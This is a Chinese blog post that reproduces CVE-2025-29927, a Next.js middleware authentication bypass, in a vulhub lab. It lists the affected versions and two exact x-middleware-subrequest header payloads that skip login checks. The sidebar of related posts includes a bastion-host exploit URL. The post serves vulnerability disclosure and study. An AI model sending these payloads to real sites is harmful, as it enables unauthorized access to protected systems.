CVE-2025-29927 Next.js 中间件鉴权绕过漏洞

已于 2025-04-10 11:11:16 修改
阅读量461 收藏 1
点赞数 4
分类专栏: 漏洞复现 文章标签: next.js
于 2025-04-10 11:10:12 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44159028/article/details/147114087
版权

Next.js

Next.js 是一个基于 React 的现代 Web 开发框架,用来构建高性能、可扩展的 Web 应用和网站。

CVE-2025-29927 Next.js 中间件鉴权绕过漏洞

CVE-2025-29927是Next.js框架中的一个授权绕过漏洞,允许攻击者通过特制的HTTP请求绕过在中间件中执行的授权检查,从而可能访问受保护的资源或执行未经授权的操作。

该漏洞的根源在于Next.js使用了一个内部HTTP头x-middleware-subrequest来防止中间件的递归调用。攻击者可以伪造此头部,导致中间件被跳过,从而绕过关键的安全检查。

影响版本

  • Next.js 1.11.4至12.3.4
  • Next.js 13.0.0至13.5.8
  • Next.js 14.0.0至14.2.24
  • Next.js 15.0.0至15.2.2

漏洞复现

参考:https://github.com/vulhub/vulhub/blob/master/next.js/CVE-2025-29927/README.zh-cn.md

环境:vulhub

当直接访问 http://192.168.67.165:3000 或者没有使用正确的登录凭据进行登录时,会重定向到登录界面

要利用此漏洞,你可以在请求中添加 x-middleware-subrequest 请求头,其值为如下所示。Next.js 中间件会错误地处理此请求头并绕过身份验证检查,从而无需输入有效登录凭据而直接进入后台。

x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware
#或者
x-middleware-subrequest: src/middleware:nowaf:src/middleware:src/middleware:src/middleware:src/middleware:middleware:middleware:nowaf:middleware:middleware:middleware:pages/_middleware

Next.js 中间件绕过漏洞 (CVE-2025-29927)
qq_43540348的博客
03-25 334
Next.js 中间件(Middleware)是一种在请求完成前拦截并处理路由的轻量级机制,它运行在Edge Runtime(边缘运行时)环境中,允许开发者通过编写代码逻辑(如身份验证、路由重定向、Header修改等)在页面渲染前动态控制请求流程。中间件文件通常命名为并放置在项目根目录或特定路径下,基于请求的路径()和上下文(如Cookies、Headers)执行逻辑,支持条件路由、A/B测试、服务端逻辑前置等场景,同时保持边缘计算的高性能低延迟特性。
Next.Js 绕过漏洞复现(附脚本)(CVE-2025-29927)
iSee857的博客
03-24 373
漏洞源于当中间件需要向内部路由发出请求时(例如获取数据或验证信息),Next.js 会自动添加x-middleware-subrequest头,以标识这是一个内部请求,防止中间件陷入无限循环。漏洞出现的关键点是 Next.js 没有正确验证这个头的来源,当内部5次重定向之后则跳过流程。当外部请求携带此头时,中间件错误地将其识别为内部子请求。(CVE-2025-29927
红队专题-漏洞挖掘-代码审计-反序列化
最新发布
aming小老弟
04-21 1923
TransformedMap⽤于对Java标准数据结构Map做⼀个修饰,被修饰过的Map在添加新的元素时,将可以执⾏⼀个回调。super(map);
Nginx架构及配置详解
企业实战系列集 ●●● https://ximenjianxue.blog.csdn.net
09-10 5764
概述 Nginx采用C进行编写,是俄罗斯程序员开发的一款轻量级的可构建Web 服务器/反向代理服务器及电子邮件(IMAP/POP3)代理服务器的软件, Nginx服务器是一个高性能的HTTP和反向代理web服务器,同时也可提供了IMAP/POP3/SMTP服务。nginx常用作跑静态和做负载反向代理,动态php交给apache处理,因后者比较稳定,jsp交给tomcat、resin或jboss。n......
永恒之蓝漏洞复现(ms17-010)
热门推荐
总有人间一两风,填我十万八千梦
01-20 2万+
Metasploit Framework(MSF)是一款开源安全漏洞检测工具,附带数千个已知的软件漏洞,并保持持续更新。Metasploit可以用来信息收集、漏洞探测、漏洞利用等渗透测试的全流程,被安全社区冠以“可以黑掉整个宇宙”之名。刚开始的Metasploit是采用Perl语言编写的,但是再后来的新版中,改成了用Ruby语言编写的了。在kali中,自带了Metasploit工具。
漏洞复现篇
总有人间一两风,填我十万八千梦
03-03 2万+
weblogic WebLogic T3 协议反序列化远程命令执行(CVE-2020-2883) Weblogic Server远程代码执行漏洞CVE-2021-2109 ) apache Struts2 S2-061 远程命令执行漏洞CVE-2020-17530) Apache Druid RCE(CVE-2021-25646) Apache Tomcat 文件包含漏洞CVE-2020-1938) Apache Flink(CVE-2020-17518/17519)任意文件上传和路径遍
WebLogic 反序列化漏洞(CVE-2019-2890)复现(超详细)
总有人间一两风,填我十万八千梦
03-16 1万+
目录 一. 漏洞介绍 二. 影响范围 三. 漏洞环境搭建 四. 漏洞复现 五. 漏洞修复 六. 漏洞检测poc 很多漏洞复现文章都不够详细,就是你按照他写的去复现会出很多很多的问题。我综合了几篇文章,写下这最详细的复现步骤。希望能帮助大家少走弯路 一. 漏洞介绍 2019年10月15日,Oracle官方发布了2019年10月安全更新公告,其中包含了一个可造成RCE远程任意代码执行的高危漏洞漏洞编号为CVE-2019-2890。 Weblogi...
Weblogic IIOP协议反序列化(CVE-2020-2551)
总有人间一两风,填我十万八千梦
03-12 1万+
目录 一. 漏洞描述 二. 影响版本 三. 漏洞环境搭建 四. 漏洞复现 五. 漏洞修复 一. 漏洞描述 2020年1月15日,Oracle发布了一系列的安全补丁,其中Oracle WebLogic Server产品有高危漏洞,漏洞编号CVE-2020-2551,CVSS评分9.8分,漏洞利用难度低,可基于IIOP协议执行远程代码。 经过分析这次漏洞主要原因是错误的过滤JtaTransactionManager类,JtaTransactionManager父类Ab...
vCenter 6.5-7.0 RCE 漏洞复现(CVE-2021-21972)附POC
总有人间一两风,填我十万八千梦
03-11 1万+
. 漏洞介绍 vSphere 是 VMware 推出的虚拟化平台套件,包含 ESXi、vCenter Server 等一系列的软件。其中 vCenter Server 为 ESXi 的控制中心,可从单一控制点统一管理数据中心的所有 vSphere 主机和虚拟机。 2021年02月24日,某些平台监测到 Vmware官方发布了vCenter Server安全更新,修复了vSphereClient (HTML5)在vCenter Server插件vRealizeOperatio...
NACOS身份认证绕过漏洞
总有人间一两风,填我十万八千梦
02-24 1万+
目录 漏洞描述 影响版本 docker-compose文件一键搭建漏洞环境 漏洞复现 修复建议 漏洞挖掘 自动化探测脚本POC nacos:Nacos 致力于帮助您发现、配置和管理微服务。Nacos 提供了一组简单易用的特性集,帮助您快速实现动态服务发现、服务配置、服务元数据及流量管理。 漏洞描述 2020年12月29日,Nacos官方在github发布的issue中披露Alibaba Nacos 存在一个由于不当处理User-Agent导致的未授访问漏洞 。通过该漏洞,攻击者可.
Apache Log4j2 RCE漏洞利用反弹shell合集
总有人间一两风,填我十万八千梦
03-10 1万+
Apache Log4j2 是一款开源的 Java 日志记录工具,大量的业务框架都使用了该组件。如:Apache Struts2、Apache Solr、Apache Druid、Apache Flink等。此次漏洞是用于 Log4j2 提供的 lookup 功能造成的,该功能允许开发者通过一些协议去读取相应环境中的配置。
VMware vCenter Server任意文件上传漏洞CVE-2021-22005)复现
总有人间一两风,填我十万八千梦
09-29 1万+
目录 漏洞描述 影响版本 漏洞检测poc 漏洞EXP 声明:切勿用于非法入侵,仅供检测与学习!传送门 ——>中华人民共和国网络安全法 漏洞描述 2021年9月21日,VMware发布安全公告,公开披露了vCenter Server中的19个安全漏洞,这些漏洞的CVSSv3评分范围为4.3-9.8。 其中,最为严重的漏洞为vCenter Server 中的任意文件上传漏洞(CVE-2021-22005),该漏洞存在于vCenter Server的分析服务中,其CVSSv3评分为 9.8.
Apache Shiro 1.2.4 反序列化漏洞(CVE-2016-4437 )
总有人间一两风,填我十万八千梦
03-28 1万+
Shiro 1.2.4 反序列化漏洞
Spring Framework远程命令执行复现(CVE-2022-22965)
总有人间一两风,填我十万八千梦
04-02 9766
2022年3月30日,Spring框架曝出RCE 0day漏洞,通过该漏洞可写入webshell以及命令执行。在Spring框架的JDK9版本(及以上版本)中,远程攻击者可在满足特定条件的基础上,通过框架的参数绑定功能获取AccessLogValve对象并诸如恶意字段值,从而触发pipeline机制并写入任意路径下的文件
齐治堡垒机任意用户登录漏洞
总有人间一两风,填我十万八千梦
04-26 9655
声明:仅供漏洞检测和学习,勿用于非法测试 漏洞披露时间 2021-04-09 fofa查询语法 app=“齐治科技-堡垒机” POC http://xxx.xxx.xxx.xxx/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=shterm 批量检测脚本 可以先用fof
HTTP.SYS远程代码执行漏洞(MS15-034)
总有人间一两风,填我十万八千梦
01-12 9076
目录 简介 影响范围 危害 漏洞复现 win2008 r2 换成win7 利用msf 简介 漏洞编号:CVE-2015-1635(MS15-034 ) 远程执行代码漏洞存在于 HTTP 协议堆栈 (HTTP.sys) 中, 当 HTTP.sys 未正确分析经特殊设计的 HTTP 请求时会导致此漏洞。 成功利用此漏洞的攻击者可以在系统帐户的上下文中执行任意代码。 影响范围 任何安装了微软IIS 6.0以上的 Win Server 2008 R2、 Win...
GitLab任意文件读取漏洞复现(CVE-2020-10977)
总有人间一两风,填我十万八千梦
01-15 8960
GitLab GitLab是一个利用 Ruby on Rails 开发的开源应用程序,实现一个自托管的Git项目仓库,可通过Web界面进行访问公开的或者私人项目。它拥有与Github类似的功能,能够浏览源代码,管理缺陷和注释。可以管理团队对仓库的访问,它非常易于浏览提交过的版本并提供一个文件历史库。它还提供一个代码片段收集功能可以轻松实现代码复用,便于日后有需要的时候进行查找。 简单来说,GitLab就是一个与github差不多的项目管理和代码托管平台 官网:https://docs.gitlab.c
Apache Druid RCE(CVE-2021-25646)复现附漏洞检测POC
总有人间一两风,填我十万八千梦
02-26 8736
目录 漏洞简介 影响版本 docker-compose一键搭建漏洞环境 漏洞复现 1. 用DNSlog探测远程命令执行 2. 反弹shell 漏洞检测POC 漏洞简介 Apache Druid:Apache Druid是一个专为大数据集的快速切片分析(OLAP查询)而设计的实时分析数据库。Druid作为数据库,最常用于支持以下用例:实时摄取、快速查询和高运行时长。例如,Druid一般用于支持分析型应用程序的GUI,或是需要快速聚合的高并发API后台。Druid最适合用于面向事件的数据。
nacos系列漏洞复现总结
总有人间一两风,填我十万八千梦
09-05 7815
Nacos支持两种启动模式:单机模式和集群模式。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Ly4j

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值